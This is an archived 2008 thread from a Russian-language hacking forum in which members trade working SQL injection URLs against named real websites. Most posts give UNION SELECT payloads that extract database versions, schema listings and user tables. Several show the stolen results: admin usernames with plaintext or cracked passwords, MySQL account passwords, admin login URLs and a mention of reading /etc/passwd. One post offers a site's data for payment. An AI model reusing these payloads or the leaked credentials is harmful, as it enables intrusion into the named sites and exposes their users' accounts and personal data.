ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #5781  
Старый 22.06.2008, 03:59
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

PR 3
Цитата:
http://www.ekomtech.kiev.ua/a-news/news.php?id=-6+union+select+1,2,3,concat(version(),0x3a3a,user( ),0x3a3a,database()),5,6,7,8,9/*
4.1.21-standard-log::ekomtech_ekomtec@localhost::ekomtech_ekomtech


PR 2
Цитата:
http://www.texnostar.com.ua/a-news/news.php?id=-1694+union+select+1,2,3,concat(version(),0x3a3a,us er(),0x3a3a,database()),5,6,7,8,9,0/*
4.1.21-standard-log::texnosta_texno@localhost::texnosta_texno


PR 2
Цитата:
http://www.unimed.com.ua/a-news/news.php?id=-2+union+select+1,2,3,concat(version(),0x3a3a,user( ),0x3a3a,database()),5,6,7,8,9/*
4.1.22::u_unimed@localhost::unimed


PR 4
Цитата:
http://www.worldconnection.nl/wclayout/news.php?site_id=-25+union+select+1,2,3,4,concat(version(),0x3a3a,us er(),0x3a3a,database()),6,7,8,9/*
4.0.12-nt::worldconnection@localhost::worldconnection
есть раскрытие путей: C:\Web\worldconnection.nl\wclayout\news.php


PR 5
Цитата:
http://www.bispublishers.nl/bookpage.php?id=-90+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37/*
5.0.26-log::eholla_bisa@wh-www22.xs4all.nl::eholla_bis


PR 4
Цитата:
http://www.condoleance.nl/register.php?id=-10254+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,u nhex(hex(concat(version(),0x3a3a,user(),0x3a3a,dat abase()))),7,8,9/*&start=1
4.1.5-gamma::bartje@localhost.condoleance.nl::condoleanc e
есть вывод /etc/passwd...
 

  #5782  
Старый 22.06.2008, 05:01
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.absoluteaudio.ru - Абсолютное Аудио

Цитата:
http://www.absoluteaudio.ru/diler.phtml?id=-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,user,password),0x71),0x71),4,5+from+mysql. user/*
root:agashi
javash:12345
chanel:damoda
basilio:asshole
chatstat:chatstat
oleconsulting:123456
news:eprst

Цитата:
http://www.absoluteaudio.ru/diler.phtml?id=-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a,nick_name,password),0x71),0x71),4,5+from+a dmins/*
admin:fk5*du
 

  #5783  
Старый 22.06.2008, 06:13
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Цитата:
http://www.alltime.ru/select.php?addmodel=-99999+union+select+1/*
хмм станно.. бутто 1 колонка. но результатов 0.
Цитата:
http://www.ukrfood.com.ua/references/index.php?id=9999999
и еще непохек.

gisTy
Цитата:
http://www.bispublishers.nl/bookpage.php?id=-90+union+select+unhex(hex(concat_ws(0x3a,user_name ,user_password))),2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37+from+eholla_bis.user/*

Последний раз редактировалось sabe; 22.06.2008 в 11:03..
 

  #5784  
Старый 22.06.2008, 07:43
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от sabe  
...
э... спасибо=)

Последний раз редактировалось gisTy; 05.07.2008 в 14:07..
 

  #5785  
Старый 22.06.2008, 10:06
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Pulset.ru
Цитата:
http://www.bestwatch.ru/watches.phtml?idb=531&idl=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,co ncat_ws(0x3a,version(),database(),user())/*
Budele.net
Цитата:
http://www.budele.net/full.php?idas=-99999%20UNION%20SELECT%201,concat_ws(0x3a,email,pa rol),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from +objav/*

Последний раз редактировалось sabe; 22.06.2008 в 23:46..
 

  #5786  
Старый 22.06.2008, 13:21
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Оплата картоном.
ПР 5

http://www.goteachit.com/view_topic.php?id=269+UNION+SELECT+1,concat_ws(0x3 A3a,username,password,id,firstname,lastname,email) +FROM+users+LIMIT+1,1/*

Код:
18:announcements
18:--1:id
18:--2:title
18:--3:content
18:--4:hidden
18:--5:priority
19:coupons
19:--1:id
19:--2:code
19:--3:expires
19:--4:volume
19:--5:discount
19:--6:active
20:curricula
20:--1:id
20:--2:id_tiers
20:--3:id_users
20:--4:title
20:--5:itemnumber
20:--6:filename
20:--7:description
20:--8:keywords
20:--9:price
20:--10:submitted
20:--11:commission
20:--12:approved
20:--13:sample
21:curricula_bad
21:--1:id
21:--2:id_tiers
21:--3:id_users
21:--4:title
21:--5:itemnumber
21:--6:filename
21:--7:description
21:--8:keywords
21:--9:price
21:--10:submitted
21:--11:commission
21:--12:approved
21:--13:sample
22:hunts
22:--1:id
22:--2:subject
22:--3:instructions
22:--4:q1
22:--5:a1
22:--6:q2
22:--7:a2
22:--8:q3
22:--9:a3
22:--10:q4
22:--11:a4
22:--12:q5
22:--13:a5
22:--14:q6
22:--15:a6
22:--16:q7
22:--17:a7
22:--18:q8
22:--19:a8
22:--20:q9
22:--21:a9
22:--22:q10
22:--23:a10
22:--24:q11
22:--25:a11
22:--26:q12
22:--27:a12
22:--28:q13
22:--29:a13
22:--30:q14
22:--31:a14
22:--32:q15
22:--33:a15
22:--34:q16
22:--35:a16
22:--36:q17
22:--37:a17
22:--38:q18
22:--39:a18
22:--40:q19
22:--41:a19
22:--42:q20
22:--43:a20
22:--44:q21
22:--45:a21
22:--46:q22
22:--47:a22
22:--48:q23
22:--49:a23
22:--50:q24
22:--51:a24
22:--52:q25
22:--53:a25
22:--54:q26
22:--55:a26
22:--56:q27
22:--57:a27
22:--58:q28
22:--59:a28
22:--60:q29
22:--61:a29
22:--62:q30
22:--63:a30
22:--64:q31
22:--65:a31
22:--66:q32
22:--67:a32
22:--68:q33
22:--69:a33
22:--70:q34
22:--71:a34
22:--72:q35
22:--73:a35
22:--74:q36
22:--75:a36
22:--76:q37
22:--77:a37
22:--78:q38
22:--79:a38
22:--80:q39
22:--81:a39
22:--82:q40
22:--83:a40
22:--84:q41
22:--85:a41
22:--86:q42
22:--87:a42
22:--88:q43
22:--89:a43
22:--90:q44
22:--91:a44
22:--92:q45
22:--93:a45
22:--94:q46
22:--95:a46
22:--96:q47
22:--97:a47
22:--98:q48
22:--99:a48
22:--100:q49
22:--101:a49
22:--102:q50
22:--103:a50
22:--104:added
23:instructions
23:--1:id
23:--2:title
23:--3:content
24:jambles
24:--1:id
24:--2:subject
24:--3:iid
24:--4:clue_1
24:--5:word_1
24:--6:clue_2
24:--7:word_2
24:--8:clue_3
24:--9:word_3
24:--10:clue_4
24:--11:word_4
24:--12:mystery_clue
24:--13:mystery_word
24:--14:added
25:purchaseorders
25:--1:id
25:--2:number
25:--3:pin
25:--4:school
25:--5:phone
25:--6:total
26:sales
26:--1:id
26:--2:curricula_id
26:--3:users_id
26:--4:datetime
26:--5:price
26:--6:firstname
26:--7:lastname
26:--8:email
27:sstp_tax_name
27:--1:id
27:--2:tax_cat
27:--3:tax_name
28:sstp_tax_records
28:--1:id
28:--2:transaction_id
28:--3:trans_total
28:--4:ship_cost
28:--5:flag_tax_shipping
28:--6:intra_st_tax
28:--7:intra_co_tax
28:--8:intra_pl_tax
28:--9:fd_intra_st_tax
28:--10:fd_intra_co_tax
28:--11:fd_intra_pl_tax
28:--12:inter_st_tax
28:--13:inter_co_tax
28:--14:inter_pl_tax
28:--15:fd_inter_st_tax
28:--16:fd_inter_co_tax
28:--17:fd_inter_pl_tax
28:--18:zip5
28:--19:zip4
28:--20:trans_date
29:sstp_tax_type
29:--1:id
29:--2:transaction_id
29:--3:tax_type1
29:--4:tax_type2
29:--5:tax_type3
29:--6:tax_type4
29:--7:tax_type5
29:--8:tax_type6
30:tiers
30:--1:id
30:--2:id_levelup
30:--3:name
30:--4:visible
30:--5:priority
31:users
31:--1:id
31:--2:username
31:--3:password
31:--4:firstname
31:--5:lastname
31:--6:address
31:--7:city
31:--8:state
31:--9:zip
31:--10:phone
31:--11:email
31:--12:strengths
31:--13:background
31:--14:consignments
31:--15:writing
31:--16:ssn
31:--17:years
31:--18:verification
31:--19:registered
31:--20:lastvisit
31:--21:ip
31:--22:approved
31:--23:payout
 

  #5787  
Старый 22.06.2008, 14:16
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Все 4 мускул

http://www.ihrc.org.uk/show.php?id=-1/**/union/**/select/**/1,2,3,4,user(),version(),database(),8,9,10,11,12,1 3/*

http://www.collegedrunkfest.com/sex.php?id=-1/**/union/**/select/**/1,2,concat(database(),char(1),user(),char(1),versi on()),4,5/*

UPD для тех, кому совсем занятся нечем))

## 5:
http://www.thesideproject.net/detail.php?show=-1/**/union/**/select/**/1,2,table_name,4,5,6,7,8/**/from/**/information_schema.tables/**/limit/**/17,1/*

## 4:
http://www.maritime-elbe.de/schatzsuche/detail.php?show=-1/**/union/**/select/**/version(),1/*

Чето непонятное, но домен прикольный))
http://www.etc.ie/products/list.php?cat=-1/**/union/**/select/**/5/*

Последний раз редактировалось BlackSun; 22.06.2008 в 15:07..
 

  #5788  
Старый 22.06.2008, 14:48
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.firstascent.co.za/news.php?id=-272+union+select+1,2,convert(concat_ws(0x3a,passwo rd,id,firstname,surname,email),binary),4,5,6,7,8,9 ,0,1,2,3+from+users/*
firstascent_admin:fa231

Цитата:
http://www.glenfair.co.za/index.php?page=info&Info=-25+union+select+1,2,convert(concat(user,0x3a,passw ord,0x3a,host),binary),4,5,6,7,8,9,0,1,2+from+mysq l.user+limit+2,1/*
024a8025373efed5:misty01

Цитата:
http://www.widnet.org.zm/news.php?id=-32+union+select+1,2,3,4,5,6,concat(username,0x3a,p assword,0x3a,email),8,9,0,1,2,3,4,5,6,7+from+cmsUs ers+limit+0,1/*
http://www.widnet.org.zm/admin.php
richard@rwatt.co.uk:iamhappy

Цитата:
http://mymovies.ws/movies.php?mode=details&id=-5222+union+select+1,concat_ws(0x3a,id,username,pas sword),3,4,5,6,7,8,9,0,1,2,3,4+from+admin_login+li mit+0,1/*
http://mymovies.ws/admin
jshnew:help@me!
 

  #5789  
Старый 22.06.2008, 16:24
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

PR-5

http://www.armorysquareofsyracuse.com/main/shopping.php?id=-44+UNION+SELECT+1,CONCAT_WS(0x3A3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26/*

Код:
17:authentication
17:--1:user_id
17:--2:user_name
17:--3:user_pass
18:events
18:--1:event_id
18:--2:sort_order
18:--3:event
18:--4:date
18:--5:location
18:--6:admission
18:--7:info
19:hc_admin
19:--1:PkID
19:--2:FirstName
19:--3:LastName
19:--4:Email
19:--5:Passwrd
19:--6:IsActive
19:--7:LoginCnt
19:--8:LastLogin
19:--9:SuperAdmin
19:--10:ShowInstructions
19:--11:PCKey
20:hc_adminloginhistory
20:--1:PkID
20:--2:AdminID
20:--3:IP
20:--4:Client
20:--5:LoginTime
21:hc_adminpermissions
21:--1:PkID
21:--2:EventEdit
21:--3:EventPending
21:--4:EventCategory
21:--5:UserEdit
21:--6:AdminEdit
21:--7:Newsletter
21:--8:Settings
21:--9:Tools
21:--10:Reports
21:--11:AdminID
21:--12:IsActive
22:hc_categories
22:--1:PkID
22:--2:CategoryName
22:--3:ParentID
22:--4:IsActive
22:--5:Path
22:--6:Level
23:hc_eventcategories
23:--1:EventID
23:--2:CategoryID
24:hc_eventnetwork
24:--1:EventID
24:--2:NetworkID
24:--3:NetworkType
24:--4:IsActive
25:hc_events
25:--1:PkID
25:--2:Title
25:--3:LocationName
25:--4:LocationAddress
25:--5:LocationAddress2
25:--6:LocationCity
25:--7:LocationState
25:--8:LocationZip
25:--9:Description
25:--10:StartDate
25:--11:StartTime
25:--12:TBD
25:--13:EndTime
25:--14:ContactName
25:--15:ContactEmail
25:--16:ContactPhone
25:--17:IsActive
25:--18:IsApproved
25:--19:IsBillboard
25:--20:SeriesID
25:--21:SubmittedByName
25:--22:SubmittedByEmail
25:--23:SubmittedAt
25:--24:AlertSent
25:--25:ContactURL
25:--26:AllowRegister
25:--27:SpacesAvailable
25:--28:PublishDate
25:--29:Views
25:--30:Message
25:--31:Directions
25:--32:Downloads
25:--33:EmailToFriend
25:--34:URLClicks
25:--35:MViews
25:--36:LocID
25:--37:Cost
25:--38:LocCountry
26:hc_locationnetwork
26:--1:LocationID
26:--2:NetworkID
26:--3:NetworkType
26:--4:IsActive
27:hc_locations
27:--1:PkID
27:--2:Name
27:--3:Address
27:--4:Address2
27:--5:City
27:--6:State
27:--7:Country
27:--8:Zip
27:--9:URL
27:--10:Phone
27:--11:Email
27:--12:Descript
27:--13:IsPublic
27:--14:IsActive
27:--15:URLClicks
27:--16:Lat
27:--17:Lon
28:hc_newsletters
28:--1:PkID
28:--2:TemplateName
28:--3:TemplateSource
28:--4:IsActive
29:hc_registrants
29:--1:PkID
29:--2:Name
29:--3:Email
29:--4:Phone
29:--5:Address
29:--6:Address2
29:--7:City
29:--8:State
29:--9:Zip
29:--10:EventID
29:--11:IsActive
29:--12:RegisteredAt
30:hc_sendtofriend
30:--1:PkID
30:--2:MyName
30:--3:MyEmail
30:--4:RecipientName
30:--5:RecipientEmail
30:--6:Message
30:--7:EventID
30:--8:IPAddress
30:--9:SendDate
31:hc_settings
31:--1:PkID
31:--2:SettingValue
32:hc_usercategories
32:--1:UserID
32:--2:CategoryID
33:hc_users
33:--1:PkID
33:--2:FirstName
33:--3:LastName
33:--4:Email
33:--5:OccupationID
33:--6:Zip
33:--7:IsRegistered
33:--8:GUID
33:--9:AddedBy
33:--10:RegisteredAt
33:--11:RegisterIP
33:--12:BirthYear
33:--13:Gender
33:--14:Referral
34:members
34:--1:member_id
34:--2:name
34:--3:short_name
34:--4:contact_name
34:--5:contact_title
34:--6:email
34:--7:web
34:--8:contact_address_1
34:--9:contact_address_2
34:--10:address_1
34:--11:address_2
34:--12:phone
34:--13:phone_2
34:--14:phone_2_label
34:--15:fax
34:--16:shopping
34:--17:dining
34:--18:personal
34:--19:entertainment
34:--20:nightlife
34:--21:live
34:--22:work
34:--23:description
34:--24:hours
34:--25:logo
34:--26:pic
35:news
35:--1:news_id
35:--2:sort_order
35:--3:headline
35:--4:date
35:--5:details
 

  #5790  
Старый 22.06.2008, 18:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.jgkdo.org/hp/show_jg.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,co ncat_ws(0x3a,name,password),11,12+FROM+user+LIMIT+ 1,1/*

Exozist:1688bc1a2663b585f4d0f7ba92f4ceb9: cracked by Ymrs: sb34ak20

adminka: jgkdo.org/hp/opz_login.htm

Ну, товарищи....покажем немцам..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ